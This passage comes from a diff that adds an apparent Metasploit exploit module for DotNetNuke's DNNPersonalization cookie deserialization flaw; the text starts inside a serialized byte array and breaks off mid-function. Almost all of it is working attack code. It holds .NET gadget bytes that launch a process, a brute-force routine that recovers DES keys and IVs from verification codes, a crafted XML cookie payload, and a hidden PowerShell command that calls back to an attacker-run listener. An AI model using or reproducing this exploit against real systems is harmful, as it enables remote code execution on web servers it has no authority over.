105, 99, + 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, + 57, 51, 52, 101, 48, 56, 57, 93, 93, 8, 2, 0, 0, 0, 2, 0, 0, 0, 9, 3, 0, 0, 0, + 2, 0, 0, 0, 9, 4, 0, 0, 0, 4, 3, 0, 0, 0, 141, 1, 83, 121, 115, 116, 101, 109, + 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, + 114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, + 112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, + 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, + 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, + 
117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, + 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, + 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 1, 0, 0, 0, 11, + 95, 99, 111, 109, 112, 97, 114, 105, 115, 111, 110, 3, 34, 83, 121, 115, 116, + 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, + 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 5, 0, 0, 0, + 17, 4, 0, 0, 0, 2, 0, 0, 0, 6, 6, 0, 0, 0 + ] + + # ObjectStateFormatter serialized data to place after the command payload. + @osf_wrapper_end = [ + 6, 7, 0, 0, 0, 3, 99, 109, 100, 4, 5, 0, 0, 0, 34, 83, 121, 115, 116, 101, + 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, + 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 3, 0, 0, 0, 8, + 68, 101, 108, 101, 103, 97, 116, 101, 7, 109, 101, 116, 104, 111, 100, 48, 7, + 109, 101, 116, 104, 111, 100, 49, 3, 3, 3, 48, 83, 121, 115, 116, 101, 109, + 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, + 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, + 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 47, 83, 121, 115, 116, 101, + 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, + 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, + 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 47, 83, 121, 115, 116, 101, + 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, + 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, + 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 8, 0, 0, 0, 9, 9, 0, 0, + 0, 9, 10, 0, 0, 0, 4, 8, 0, 0, 0, 48, 83, 121, 115, 116, 101, 109, 46, 68, + 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, + 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, + 97, 116, 101, 69, 110, 116, 114, 121, 7, 0, 
0, 0, 4, 116, 121, 112, 101, 8, + 97, 115, 115, 101, 109, 98, 108, 121, 6, 116, 97, 114, 103, 101, 116, 18, + 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 65, 115, 115, 101, 109, 98, + 108, 121, 14, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 78, 97, 109, + 101, 10, 109, 101, 116, 104, 111, 100, 78, 97, 109, 101, 13, 100, 101, 108, + 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 1, 1, 2, 1, 1, 1, 3, 48, 83, + 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, + 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, + 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 6, 11, + 0, 0, 0, 176, 2, 83, 121, 115, 116, 101, 109, 46, 70, 117, 110, 99, 96, 51, + 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, + 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, + 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, + 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, + 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, + 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 83, + 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, + 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, + 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, + 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, + 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, + 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, + 115, 46, 80, 114, 111, 99, 101, 115, 115, 44, 32, 83, 121, 115, 116, 101, + 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, + 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, + 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, + 110, 61, 
98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, + 93, 6, 12, 0, 0, 0, 75, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, + 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, + 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, + 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, + 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 10, 6, 13, 0, 0, 0, + 73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, + 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, + 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, + 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, + 52, 101, 48, 56, 57, 6, 14, 0, 0, 0, 26, 83, 121, 115, 116, 101, 109, 46, 68, + 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, + 115, 115, 6, 15, 0, 0, 0, 5, 83, 116, 97, 114, 116, 9, 16, 0, 0, 0, 4, 9, 0, + 0, 0, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, + 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, + 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, + 114, 7, 0, 0, 0, 4, 78, 97, 109, 101, 12, 65, 115, 115, 101, 109, 98, 108, + 121, 78, 97, 109, 101, 9, 67, 108, 97, 115, 115, 78, 97, 109, 101, 9, 83, + 105, 103, 110, 97, 116, 117, 114, 101, 10, 83, 105, 103, 110, 97, 116, 117, + 114, 101, 50, 10, 77, 101, 109, 98, 101, 114, 84, 121, 112, 101, 16, 71, 101, + 110, 101, 114, 105, 99, 65, 114, 103, 117, 109, 101, 110, 116, 115, 1, 1, 1, + 1, 1, 0, 3, 8, 13, 83, 121, 115, 116, 101, 109, 46, 84, 121, 112, 101, 91, + 93, 9, 15, 0, 0, 0, 9, 13, 0, 0, 0, 9, 14, 0, 0, 0, 6, 20, 0, 0, 0, 62, 83, + 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, + 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83, + 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 
103, 44, 32, 83, 121, + 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 21, 0, 0, 0, 62, + 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, + 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, + 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, + 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, + 10, 1, 10, 0, 0, 0, 9, 0, 0, 0, 6, 22, 0, 0, 0, 7, 67, 111, 109, 112, 97, + 114, 101, 9, 12, 0, 0, 0, 6, 24, 0, 0, 0, 13, 83, 121, 115, 116, 101, 109, + 46, 83, 116, 114, 105, 110, 103, 6, 25, 0, 0, 0, 43, 73, 110, 116, 51, 50, + 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46, + 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, + 116, 114, 105, 110, 103, 41, 6, 26, 0, 0, 0, 50, 83, 121, 115, 116, 101, + 109, 46, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, + 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, + 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1, + 16, 0, 0, 0, 8, 0, 0, 0, 6, 27, 0, 0, 0, 113, 83, 121, 115, 116, 101, 109, + 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 96, 49, 91, 91, 83, 121, + 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, + 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, + 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, + 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, + 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, + 52, 101, 48, 56, 57, 93, 93, 9, 12, 0, 0, 0, 10, 9, 12, 0, 0, 0, 9, 24, 0, + 0, 0, 9, 22, 0, 0, 0, 10, 11 + ] + + @cr_regex = /(?<=Copyright \(c\) 2002-)(\d{4})/ + + # ================== + # v9.1.1+ VARIABLES + # ================== + + + @key_charset = "02468ABDF" + @verification_codes = [] + + @iv_regex = /[0-9A-F]{8}/ + + # Known plaintext + @kpt = "" + 
+ # Encryption objects
+ @decryptor = OpenSSL::Cipher.new('des')
+ @decryptor.decrypt
+
+ @encryptor = OpenSSL::Cipher.new('des')
+ @encryptor.encrypt
+
+ # final passphrase (key +iv) to use for payload (v9.1.1+)
+ @passphrase = ""
+
+ # ==================
+ # v9.2.0+ VARIABLES
+ # ==================
+
+ # Session token needed for exploitation (v9.2.0+)
+ @session_token = ""
+
+ # ==================
+ # v9.2.2+ VARIABLES
+ # ==================
+
+ # User ID format (v9.2.2+)
+ # Number of characters of user ID available in plaintext
+ # is equal to the length of a GUID (no spaces or dashes)
+ # minus (blocksize - known plaintext length).
+ @user_id_pt_length = 32 - (8 - @kpt.length)
+ @user_id_regex = /[0-9a-f]{#{@user_id_pt_length}}/
+
+ # Plaintext found from decryption (v9.2.2+)
+ @found_pt = ""
+
+ @iv_charset = "0123456789abcdef"
+
+ # Possible IVs used to encrypt verification codes (v9.2.2+)
+ @possible_ivs = Set.new([])
+
+ # Possible keys used to encrypt verification codes (v9.2.2+)
+ @possible_keys = Set.new([])
+
+ # passphrases (key + iv) values to use for payload encryption (v9.2.2+)
+ @passphrases = []
+
+ # char sets to use when generating possible base keys
+ @unchanged = Set.new([65,70])
+ end
+
+ def decode_verification(code)
+ # Decode verification code base don DNN format
+ return String.new(
+ Rex::Text.decode_base64(
+ code.chomp.gsub(".", "+").gsub("-", "/").gsub("_", "=")
+ )
+ )
+ end
+
+ # ==============
+ # Main function
+ # ==============
+ def exploit
+
+ return unless check == Exploit::CheckCode::Appears
+
+ @encrypted = datastore['ENCRYPTED']
+ verification_code = datastore['VERIFICATION_CODE']
+ if File.file?(verification_code)
+ File.readlines(verification_code).each do |code|
+ @verification_codes.push(decode_verification(code))
+ end
+ else
+ @verification_codes.push(decode_verification(verification_code))
+ end
+
+ @kpt = datastore['VERIFICATION_PLAIN']
+
+ @session_token = datastore['SESSION_TOKEN']
+ @dry_run = datastore['DryRun']
+ key = datastore['KEY']
+ iv = datastore['IV']
+
+ if target['ReqEncrypt'] && @encrypted == false
+ print_warning("Target requires encrypted payload. Exploit may not succeed.")
+ end
+
+ if @encrypted
+ # Requires either supplied key and IV, or verification code and plaintext
+ if (!key.blank? && !iv.blank?)
+ @passphrase = key + iv
+ # Key and IV were supplied, don't try and decrypt.
+ @try_decrypt = false
+ elsif (!@verification_codes.empty? && !@kpt.blank?)
+ @try_decrypt = true
+ else
+ fail_with(Failure::BadConfig, "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).")
+ end
+ end
+
+ if target['ReqSession']
+ if @session_token.blank?
+ fail_with(Failure::BadConfig, "Target requires a valid SESSION_TOKEN for exploitation.")
+ end
+ end
+
+ if @encrypted && @try_decrypt
+ # Set IV for decryption as the known plaintext, manually
+ # apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed.
+ # For v9.1.1 - v9.2.1 this will find the valid KEY and IV value in real time.
+ # For v9.2.2+ it will find an initial base key faster than if padding were enabled.
+ f8_plain = @kpt[0, 8]
+ c_iv = f8_plain.unpack("C*") + [8 - f8_plain.length] * (8 - f8_plain.length)
+ @decryptor.iv = String.new(c_iv.pack("C*"))
+ @decryptor.padding = 0
+
+ key = find_key(@verification_codes[0])
+ if key.blank?
+ return
+ end
+
+ if @target_idx == 4
+ # target is v9.2.2+, requires base64 generated key and IV values.
+ generate_base_keys(0, key.each_byte.to_a, "")
+ vprint_status("Generated #{@possible_keys.size} possible base KEY values from #{key}")
+
+ # re-enable padding here as it doesn't have the
+ # same performance impact when trying to find possible IV values.
+ @decryptor.padding = 1
+
+ print_warning("Finding possible base IVs. This may take a few minutes...")
+ start = Time.now
+ find_ivs(@verification_codes, key)
+ elapsed = Time.now - start
+ vprint_status(
+ format(
+ "Found %<n_ivs>d potential Base IV values using %<n_codes>d "\
+ "verification codes in %<e_time>.2f seconds.",
+ n_ivs: @possible_ivs.size,
+ n_codes: @verification_codes.size,
+ e_time: elapsed.to_s
+ )
+ )
+
+ generate_payload_passphrases
+ vprint_status(format("Generated %<n_phrases>d possible base64 KEY and IV combinations.", n_phrases: @passphrases.size))
+ end
+
+ if @passphrase.blank?
+ # test all generated passphrases by
+ # sending an exploit payload to the target
+ # that will callback to an HTTP listener
+ # with the index of the passphrase that worked.
+
+ # set SRVHOST as LHOST value for HTTPServer mixin
+ datastore['SRVHOST'] = datastore['LHOST']
+ print_warning("Trying all possible KEY and IV combinations...")
+ print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
+ start_service
+ vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
+
+ test_passphrases
+
+ # If no working passphrase has been found,
+ # wait to allow the the chance for the last one to callback.
+ if @passphrase.empty? && !@dry_run
+ sleep(wfs_delay)
+ end
+ if service
+ stop_service
+ end
+ print "\r\n"
+ if !@passphrase.empty?
+ print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
+ end
+ end
+ end
+ send_exploit_payload
+ end
+
+ # =====================
+ # For the check command
+ # =====================
+ def check
+ if target.name == 'Automatic'
+ select_target
+ end
+
+ @target_idx = Integer(datastore['TARGET'])
+
+ if @target_idx == 0
+ fail_with(Failure::NoTarget, 'No valid target found or specified.')
+ end
+
+ # Check if 404 page is custom or not.
+ # Vulnerability requires custom 404 handling (enabled by default).
+ uri = normalize_uri(target_uri.path)
+ print_status("Checking for custom error page at: #{uri} ...")
+ res = send_request_cgi(
+ 'uri' => uri
+ )
+
+ if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
+ print_good("Custom error page detected.")
+ else
+ print_error("IIS Error Page detected.")
+ return Exploit::CheckCode::Safe
+ end
+ return Exploit::CheckCode::Appears
+ end
+
+ # ===========================
+ # Auto-select target version
+ # ===========================
+ def select_target
+ print_status("Trying to determine DNN Version...")
+ # Check for copyright version in /Documentation/license.txt
+ uri = %r{^(.*[\\\/])}.match(target_uri.path)[0]
+ vprint_status("Checking version at #{normalize_uri(uri + 'Documentation', 'License.txt')} ...")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri + 'Documentation', 'License.txt')
+ )
+ year = -1
+ if res && res.code == 200
+ # License page found, get latest copyright year.
+ matches = @cr_regex.match(res.body)
+ if matches
+ year = matches[0].to_i
+ end
+ else
+ vprint_status("Checking version at #{uri} ...")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri)
+ )
+ if res && res.code == 200
+ # Check if copyright info is in page HTML.
+ matches = @cr_regex.match(res.body)
+ if matches
+ year = matches[0].to_i
+ end
+ end
+ end
+
+ if year >= 2018
+ print_warning(
+ %q(DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN.
+Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2.
+Try setting target 4 and supply a file of of verification codes or specifiy valid Key and IV values.")
+ )
+ datastore['TARGET'] = 3
+ elsif year == 2017
+ print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED')
+ datastore['TARGET'] = 2
+ elsif year < 2017 && year > 2008
+ print_good("DNN Version Found: v5.1.0 - v9.0.1")
+ datastore['TARGET'] = 1
+ elsif year == 2008
+ print_warning("DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).")
+ datastore['TARGET'] = 1
+ else
+ print_warning("Could not determine DNN version. Target may still be vulnerable. Manually set the Target value")
+ end
+ end
+
+ # ==============================
+ # Known plaintext attack to
+ # brute-force the encryption key
+ # ==============================
+ def find_key(cipher_text)
+ print_status("Finding Key...")
+
+ # Counter
+ total_keys = @key_charset.length**8
+ i = 1
+
+ # Set start time
+ start = Time.now
+
+ # First char
+ @key_charset.each_byte do |a|
+ key = a.chr
+ # 2
+ @key_charset.each_byte do |b|
+ key[1] = b.chr
+ # 3
+ @key_charset.each_byte do |c|
+ key[2] = c.chr
+ # 4
+ @key_charset.each_byte do |d|
+ key[3] = d.chr
+ # 5
+ @key_charset.each_byte do |e|
+ key[4] = e.chr
+ # 6
+ @key_charset.each_byte do |f|
+ key[5] = f.chr
+ # 7
+ @key_charset.each_byte do |g|
+ key[6] = g.chr
+ # 8
+ @key_charset.each_byte do |h|
+ key[7] = h.chr
+ if decrypt_data_and_iv(@decryptor, cipher_text, String.new(key))
+ elapsed = Time.now - start
+ print_search_status(i, elapsed, total_keys)
+ print_line
+ if @target_idx == 4
+ print_good("Possible Base Key Value Found: " + key)
+ else
+ print_good("KEY Found: " + key)
+ print_good("IV Found: " + @passphrase[8..-1])
+ end
+ vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
+ vprint_status(format("Time to crack: %<c_time>.3f seconds", c_time: elapsed.to_s))
+ return String.new(key)
+ end
+ # Print timing info every 5 million attempts
+ if i % 5000000 == 0
+ print_search_status(i, Time.now - start, total_keys)
+ end
+ i += 1
+ end
+ end
+ end
+ end
+ end
+ end
+ end
+ end
+ elapsed = Time.now - start
+ print_search_status(i, elapsed, total_keys)
+ print_line
+ print_error("Key not found")
+ vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
+ vprint_status(format("Time run: %<r_time>.3f seconds", r_time: elapsed.to_s))
+ return nil
+ end
+
+ # ==================================
+ # Attempt to decrypt a ciphertext
+ # and obtain the IV at the same time
+ # ==================================
+ def decrypt_data_and_iv(cipher, cipher_text, key)
+ cipher.key = key
+ begin
+ plaintext = cipher.update(cipher_text) + cipher.final
+ if @target_idx == 4
+ # Target is v9.2.2+
+ user_id = plaintext[8, @user_id_pt_length]
+ if @user_id_regex.match(user_id)
+ return true
+ end
+
+ return false
+ end
+
+ # This should only execute if the version is 9.1.1 - 9.2.1
+ iv = plaintext[0, 8]
+ if !@iv_regex.match(iv)
+ return false
+ end
+
+ # Build encryption passphrase as DNN does.
+ @passphrase = key + iv
+
+ # Encrypt the plaintext value using the discovered key and IV
+ # and compare with the initial ciphertext
+ if cipher_text == encrypt_data(@encryptor, @kpt, @passphrase)
+ @passphrases.push(String.new(key + iv))
+ return true
+ end
+ rescue StandardError
+ # Ignore decryption errors to allow execution to continue
+ return false
+ end
+ return false
+ end
+
+ def print_search_status(num_tries, elapsed, max_tries)
+ msg = format("Searching at %<s_rate>.3f keys/s ...... %<p_complete>.2f%% of keyspace complete.", s_rate: num_tries / elapsed, p_complete: (num_tries / max_tries.to_f) * 100)
+ print("\r%bld%blu[*]%clr #{msg}")
+ end
+
+ # ===========================
+ # Encrypt data using the same
+ # pattern that DNN uses.
+ # ===========================
+ def encrypt_data(cipher, message, passphrase)
+ cipher.key = passphrase[0, 8]
+ cipher.iv = passphrase[8, 8]
+ return cipher.update(message) + cipher.final
+ end
+
+ # ===============================================
+ # Generate all possible base key values
+ # used to create the final passphrase in v9.2.2+.
+ # DES weakness allows multiple bytes to be
+ # interpreted as the same value.
+ # ===============================================
+ def generate_base_keys(pos, from_key, new_key)
+ if !@unchanged.include? from_key[pos]
+ if from_key[pos] % 2 == 0
+ new_key[pos] = (from_key[pos] + 1).chr
+ else
+ new_key[pos] = (from_key[pos] - 1).chr
+ end
+
+ if new_key.length == 8
+ @possible_keys.add(String.new(new_key))
+
+ # also add key with original value
+ new_key[pos] = (from_key[pos]).chr
+ @possible_keys.add(String.new(new_key))
+ else
+ generate_base_keys(pos + 1, from_key, String.new(new_key))
+
+ # also generate keys with original value
+ new_key[pos] = (from_key[pos]).chr
+ generate_base_keys(pos + 1, from_key, String.new(new_key))
+ end
+ else
+ new_key[pos] = (from_key[pos]).chr
+ if new_key.length == 8
+ @possible_keys.add(String.new(new_key))
+ else
+ generate_base_keys(pos + 1, from_key, String.new(new_key))
+ end
+ end
+ end
+
+ # ==============================================
+ # Find all possible base IV values
+ # used to create the final Encryption passphrase
+ # ==============================================
+ def find_ivs(cipher_texts, key)
+ num_chars = 8 - @kpt.length
+ f8regex = /#{@kpt}[0-9a-f]{#{num_chars}}/
+
+ @decryptor.key = key
+ found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
+ # Find all possible IVs for the first ciphertext
+ brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
+
+ # Reduce IV set by testing against other ciphertexts
+ cipher_texts.drop(1).each do |cipher_text|
+ @possible_ivs.each do |iv|
+ @decryptor.iv = iv
+ pt = @decryptor.update(cipher_text) + @decryptor.final
+ if !f8regex.match(pt[0, 8])
+ @possible_ivs.delete(iv)
+ end
+ end
+ end
+ end
+
+ # ==========================================
+ # A recursive function to find all
+ # possible valid IV values using brute-force
+ # ==========================================
+ def brute_force_ivs(pt_prefix, num_chars_needed, cipher_text, key, found_pt)
+ charset = "0123456789abcdef"
+ if num_chars_needed == 0
+ @decryptor.key = key
+ @decryptor.iv = pt_prefix
+ pt = @decryptor.update(cipher_text) + @decryptor.final
+ iv = pt[0, 8]
+ if @iv_regex.match(iv)
+ pt = pt_prefix + found_pt
+ if encrypt_data(@encryptor, pt, key + iv) == cipher_text
+ @possible_ivs.add(String.new(iv))
+ end
+ end
+ return
+ end
+ charset.length.times do |i|
+ brute_force_ivs(String.new(pt_prefix + charset[i]), num_chars_needed - 1, cipher_text, key, found_pt)
+ end
+ end
+
+ # ========================================
+ # Generate all possible payload encryption
+ # passphrases for a v9.2.2+ target
+ # ========================================
+ def generate_payload_passphrases
+ phrases = Set.new(@passphrases)
+ @possible_keys.each do |key|
+ @possible_ivs.each do |iv|
+ phrase = Rex::Text.encode_base64(
+ encrypt_data(@encryptor, key + iv, key + iv)
+ )
+ phrases.add(String.new(phrase[0, 16]))
+ end
+ end
+ @passphrases = phrases.to_a
+ end
+
+ # ===========================================
+ # Test all generated passphrases by initializing
+ # an HTTP server to listen for a callback that
+ # contains the index of the successful passphrase.
+ # ===========================================
+ def test_passphrases
+ for i in 0..@passphrases.size - 1
+ # Stop sending if we've found the passphrase
+ if !@passphrase.empty?
+ break
+ end
+
+ msg = format("Trying KEY and IV combination %<current>d of %<total>d...", current: i + 1, total: @passphrases.size)
+ print("\r%bld%blu[*]%clr #{msg}")
+
+ url = "#{get_uri}?#{get_resource.delete('/')}=#{i}"
+ payload = create_request_payload(url)
+ cookie = create_cookie(payload)
+
+ # Encrypt cookie value
+ enc_cookie = Rex::Text.encode_base64(
+ encrypt_data(@encryptor, cookie, @passphrases[i])
+ )
+ if @dry_run
+ print_line
+ print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
+ print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...")
+ print_line(enc_cookie)
+ break
+ end
+ execute_command(enc_cookie, host: datastore['RHOST'])
+ end
+ end
+
+ # ===============================
+ # Request handler for HTTP server.
+ # ==============================
+ def on_request_uri(cli, request)
+ # Send 404 to prevent scanner detection
+ send_not_found(cli)
+
+ # Get found index - should be the only query string parameter
+ if request.qstring.size == 1 && request.qstring[get_resource.delete('/').to_s]
+ index = request.qstring[get_resource.delete('/').to_s].to_i
+ @passphrase = String.new(@passphrases[index])
+ end
+ end
+
+ # ==============================================
+ # Create payload to callback to the HTTP server.
+ # Note: This technically exploits the
+ # vulnerability, but provides a way to determine
+ # the valid passphrase needed to exploit again.
+ # ==============================================
+ def create_request_payload(url)
+ psh_cmd = "/b /c start /b /min powershell.exe -nop -w hidden -noni -Command \"Invoke-WebRequest '#{url}'\""
+ psh_cmd_bytes = psh_cmd.bytes.to_a
+
+ cmd_size_bytes = write_encoded_int(psh_cmd.length)
+
+ # Package payload into serialized object
+ payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
+
+ object_size = write_encoded_int(payload_object.length)
+
+ # Create the final seralized ObjectStateFormatter payload
+ final_payload = @osf_header + object_size + payload_object
+
+ b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
+ return b64_payload
+ end
+
+ # =============================================
+ # Reproduce the WriteEncoded method in
+ # the native .NET ObjectStateFormatter.cs file.
+ # =============================================
+ def write_encoded_int(value)
+ enc = []
+ while (value >= 0x80)
+ v = value | 0x80
+ enc.push([v].pack("V")[0].unpack1("C*"))
+ value >>= 7
+ end
+ enc.push([value].pack("V")[0].unpack1("C*"))
+ return enc
+ end
+
+ # =================================
+ # Creates the payload cookie
+ # using the specified payload
+ # =================================
+ def create_cookie(payload)
+ cookie = "<profile>"\
+ "<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\
+ "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\
+ "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\
+ "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\
+ "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\
+ "<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
+ "<ProjectedProperty0>"\
+ "<MethodName>Deserialize</MethodName>"\
+ "<MethodParameters>"\
+ "<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
+ "xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\" "\
+ ">#{payload}</anyType>"\
+ "</MethodParameters>"\
+ "<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
+ "i:type=\"ObjectStateFormatter\" />"\
+ "</ProjectedProperty0>"\
+ "</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
+ "</item>"\
+ "</profile>"
+ return cookie
+ end
+
+ # =========================================
+ # Send the payload to the target server.
+ # =========================================
+ def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port })
+ uri = normalize_uri(target_uri.path)
+
+ res = send_request_cgi(
+ 'uri' => uri,
+ 'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};"
+ )
+ if !res
+ fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.")
+ elsif res.code == 404
+ return true
+ elsif res.code == 400
+ fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
+ else
